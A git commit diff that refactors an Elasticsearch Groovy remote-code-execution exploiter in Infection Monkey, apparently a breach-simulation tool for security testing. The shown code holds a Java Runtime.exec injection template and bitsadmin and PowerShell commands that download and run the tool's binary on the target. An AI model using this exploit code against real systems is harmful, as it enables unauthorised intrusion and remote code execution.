Refactored elastic according to latest web_rce framework changes. Tested on windows and linux

2018-08-24 14:27:48 +03:00 · 2018-08-24 14:27:48 +03:00 · 56b3190cb5
parent 76523e7379
commit 56b3190cb5
1 changed files with 16 additions and 42 deletions
--- a/infection_monkey/exploit/elasticgroovy.py
+++ b/infection_monkey/exploit/elasticgroovy.py
@ -7,13 +7,12 @@
 import json
 import logging
 import requests
-from network.elasticfinger import ES_SERVICE, ES_PORT
 from exploit.web_rce import WebRCE
 from model import WGET_HTTP_UPLOAD

 import re

-__author__ = 'danielg'
+__author__ = 'danielg, VakarisZ'

 LOG = logging.getLogger(__name__)

@ -31,55 +30,30 @@ class ElasticGroovyExploiter(WebRCE):
               % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"""
    JAVA_GET_BIT_LINUX = JAVA_CMD % '/bin/uname -m'

-    DOWNLOAD_TIMEOUT = 300  # copied from rdpgrinder
-
    # Both commands are prepared for use in future development
    RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s'
-    POWERSHELL_COMMAND = r"powershell -Command \\\"Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing\\\""
+    POWERSHELL_COMMAND = r"powershell -Command \\\"Invoke-WebRequest -Uri '%(http_path)s'" \
+                         r" -OutFile '%(monkey_path)s' -UseBasicParsing\\\""

    _TARGET_OS_TYPE = ['linux', 'windows']

    def __init__(self, host):
        super(ElasticGroovyExploiter, self).__init__(host)

-    def exploit_host(self):
-        # self.exploit_host_linux()
-        if ES_SERVICE not in self.host.services:
-            LOG.info("Host: %s doesn't have ES open" % self.host.ip_addr)
-            return False
-        # Build url from host and elastic port(not https)
-        urls = self.build_potential_urls([[ES_PORT, False]], ['_search?pretty'])
-        vulnerable_urls = []
-        for url in urls:
-            if self.check_if_exploitable(url):
-                vulnerable_urls.append(url)
-        self._exploit_info['vulnerable_urls'] = vulnerable_urls
-        if not vulnerable_urls:
-            return False
+    def get_exploit_config(self):
+        exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config()
+        exploit_config['dropper'] = True
+        exploit_config['url_extensions'] = ['_search?pretty']
+        exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': self.RDP_CMDLINE_HTTP}
+        return exploit_config

-        if self.skip_exist and self.check_remote_files(vulnerable_urls[0]):
-            LOG.info("Host %s was already infected under the current configuration, done" % self.host)
-            return True
-
-        if not self.set_host_arch(vulnerable_urls[0]):
-            return False
-
-        commands = {'windows': self.RDP_CMDLINE_HTTP,
-                    'linux': WGET_HTTP_UPLOAD}
-
-        data = self.upload_monkey(vulnerable_urls[0], commands)
-
-        # We can't use 'if not' because response may be ''
-        if data is not False and data['response'] is False:
-            return False
-
-        if self.change_permissions(vulnerable_urls[0], data['path']) is False:
-            return False
-
-        if self.execute_remote_monkey(vulnerable_urls[0], data['path'], True) is False:
-            return False
-
-        return True
+    def get_open_service_ports(self, port_list, names):
+        # We must append elastic port we get from elastic fingerprint module because It's not marked as 'http' service
+        valid_ports = super(ElasticGroovyExploiter, self).get_open_service_ports(port_list, names)
+        elastic_service = [service for service in self.host.services if 'elastic-search' in service][0]
+        elastic_port = [elastic_service.lstrip('elastic-search-'), False]
+        valid_ports.append(elastic_port)
+        return valid_ports

    def exploit(self, url, command):
        command = re.sub(r"\\", r"\\\\\\\\", command)